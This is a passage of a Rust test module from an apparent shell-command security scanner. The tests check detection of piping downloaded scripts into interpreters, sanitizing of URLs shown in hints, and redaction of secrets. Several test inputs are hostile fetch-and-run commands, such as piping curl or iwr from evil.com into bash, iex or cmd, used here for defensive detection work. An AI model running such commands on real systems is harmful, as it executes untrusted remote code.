3013        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3014        assert_eq!(findings.len(), 1);
3015        assert!(
3016            !findings[0].description.contains("getvet.sh"),
3017            "non-fetch source should NOT get vet hint"
3018        );
3019        assert!(
3020            !findings[0].description.contains("tirith run"),
3021            "non-fetch source should NOT get tirith run hint"
3022        );
3023    }
3024
3025    #[test]
3026    fn test_dashdash_stops_flag_skipping() {
3027        // "command -- -x" should treat -x as the command, not a flag
3028        let input = "curl https://example.com/install.sh | command -- bash";
3029        let segments = tokenize::tokenize(input, ShellType::Posix);
3030        let mut findings = Vec::new();
3031        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3032        assert_eq!(findings.len(), 1, "should detect bash after --");
3033    }
3034
3035    #[test]
3036    fn test_sudo_dashdash_resolves_command() {
3037        // "sudo -- bash" should resolve to bash (-- ends sudo's options)
3038        let input = "curl https://example.com/install.sh | sudo -- bash";
3039        let segments = tokenize::tokenize(input, ShellType::Posix);
3040        let mut findings = Vec::new();
3041        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3042        assert_eq!(findings.len(), 1, "should detect bash after sudo --");
3043        assert!(
3044            findings[0].description.contains("interpreter 'bash'"),
3045            "should resolve to bash: {}",
3046            findings[0].description
3047        );
3048    }
3049
3050    #[test]
3051    fn test_ansic_quoting_not_applied_to_fish() {
3052        // Fish doesn't support $'...' — it should be treated as literal $
3053        assert_eq!(normalize_shell_token("$'bash'", ShellType::Fish), "$bash");
3054        // But POSIX should strip the $'...' wrapper
3055        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
3056    }
3057
3058    #[test]
3059    fn test_powershell_doubled_single_quote() {
3060        // PowerShell: '' inside single quotes is an escaped literal '
3061        assert_eq!(
3062            normalize_shell_token("'it''s'", ShellType::PowerShell),
3063            "it's"
3064        );
3065        // POSIX: '' ends and reopens — produces empty join
3066        assert_eq!(normalize_shell_token("'it''s'", ShellType::Posix), "its");
3067    }
3068
3069    #[test]
3070    fn test_sudo_combined_short_flags() {
3071        // sudo -iu root bash: -iu means -i -u, where -u takes "root" as value
3072        let input = "curl https://example.com/install.sh | sudo -iu root bash";
3073        let segments = tokenize::tokenize(input, ShellType::Posix);
3074        let mut findings = Vec::new();
3075        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3076        assert_eq!(
3077            findings.len(),
3078            1,
3079            "should detect pipe to bash through sudo -iu root"
3080        );
3081        assert!(
3082            findings[0].description.contains("interpreter 'bash'"),
3083            "should resolve to bash, not root: {}",
3084            findings[0].description
3085        );
3086    }
3087
3088    #[test]
3089    fn test_pipe_to_interpreter_hint_iwr_powershell() {
3090        let input = "iwr https://evil.com/script.ps1 | iex";
3091        let segments = tokenize::tokenize(input, ShellType::PowerShell);
3092        let mut findings = Vec::new();
3093        check_pipe_to_interpreter(&segments, ShellType::PowerShell, &mut findings);
3094        assert_eq!(findings.len(), 1);
3095        assert!(
3096            findings[0].description.contains("getvet.sh"),
3097            "iwr (PowerShell fetch) should get vet hint"
3098        );
3099        assert!(
3100            !findings[0].description.contains("tirith run"),
3101            "PowerShell fetch should NOT suggest tirith run"
3102        );
3103    }
3104
3105    #[test]
3106    fn test_pipe_to_interpreter_hint_sanitizes_ansi_in_url() {
3107        // \x1b[31m is an ANSI "red" escape — must be stripped from hint
3108        let input = "curl https://example.com/\x1b[31mred | bash";
3109        let segments = tokenize::tokenize(input, ShellType::Posix);
3110        let mut findings = Vec::new();
3111        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3112        assert_eq!(findings.len(), 1);
3113        assert!(
3114            !findings[0].description.contains('\x1b'),
3115            "ANSI escape must be stripped from hint URL: {}",
3116            findings[0].description
3117        );
3118        assert!(
3119            findings[0]
3120                .description
3121                .contains("https://example.com/[31mred"),
3122            "URL should be present minus the ESC byte: {}",
3123            findings[0].description
3124        );
3125    }
3126
3127    #[test]
3128    fn test_pipe_to_interpreter_hint_sanitizes_newline_in_url() {
3129        // Newline in URL arg could spoof extra output lines
3130        let input = "curl \"https://example.com/\nFAKE: safe\" | bash";
3131        let segments = tokenize::tokenize(input, ShellType::Posix);
3132        let mut findings = Vec::new();
3133        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3134        assert_eq!(findings.len(), 1);
3135        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
3136        let hint_line = findings[0]
3137            .description
3138            .lines()
3139            .find(|l| l.contains("Safer:"))
3140            .expect("should have hint line");
3141        assert!(
3142            hint_line.contains("example.com/FAKE"),
3143            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
3144        );
3145        // Verify no line starts with "FAKE" (would indicate injection)
3146        assert!(
3147            !findings[0]
3148                .description
3149                .lines()
3150                .any(|l| l.starts_with("FAKE")),
3151            "newline injection must not create a spoofed output line: {}",
3152            findings[0].description
3153        );
3154    }
3155
3156    #[test]
3157    fn test_sanitize_url_for_display() {
3158        assert_eq!(
3159            sanitize_url_for_display("https://ok.com/path"),
3160            "https://ok.com/path"
3161        );
3162        assert_eq!(
3163            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
3164            "https://evil.com/[31mred[0m"
3165        );
3166        assert_eq!(
3167            sanitize_url_for_display("https://evil.com/\n\rspoof"),
3168            "https://evil.com/spoof"
3169        );
3170        assert_eq!(
3171            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
3172            "https://evil.com/bellnull"
3173        );
3174    }
3175
3176    #[test]
3177    fn test_pipe_to_interpreter_cmd_quoted_caret_cmd() {
3178        let findings = check_default("curl https://evil.com | \"c^md\" /c dir", ShellType::Cmd);
3179        assert!(
3180            findings
3181                .iter()
3182                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
3183            "quoted cmd caret escapes should still detect the interpreter pipe"
3184        );
3185    }
3186
3187    #[test]
3188    fn test_redact_env_value_never_returns_secret() {
3189        assert_eq!(redact_env_value(""), "");
3190        assert_eq!(redact_env_value("sk-abc123"), "[REDACTED]");
3191        assert_eq!(redact_env_value("ABCDEFGHIJKLMNOPQRSTUVWX"), "[REDACTED]");
3192    }
3193
3194    #[test]
3195    fn test_source_command_arrays_consistent() {
3196        // is_source_command is composed from the three const arrays.
3197        // Verify all arrays contribute and is_source_command rejects unknowns.
3198        for cmd in POSIX_FETCH_COMMANDS {
3199            assert!(
3200                is_source_command(cmd),
3201                "POSIX_FETCH entry '{cmd}' not recognized"
3202            );
3203            assert!(
3204                is_url_fetch_command(cmd),
3205                "POSIX_FETCH entry '{cmd}' not in fetch union"
3206            );
3207        }
3208        for cmd in POWERSHELL_FETCH_COMMANDS {
3209            assert!(
3210                is_source_command(cmd),
3211                "PS_FETCH entry '{cmd}' not recognized"
3212            );
3213            assert!(
3214                is_url_fetch_command(cmd),
3215                "PS_FETCH entry '{cmd}' not in fetch union"
3216            );
3217        }
3218        for cmd in NON_FETCH_SOURCE_COMMANDS {
3219            assert!(
3220                is_source_command(cmd),
3221                "NON_FETCH entry '{cmd}' not recognized"
3222            );
3223            assert!(
3224                !is_url_fetch_command(cmd),
3225                "NON_FETCH entry '{cmd}' should not be in fetch union"
3226            );
3227        }
3228        assert!(
3229            !is_source_command("cat"),
3230            "cat should not be a source command"
3231        );
3232    }
3233}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs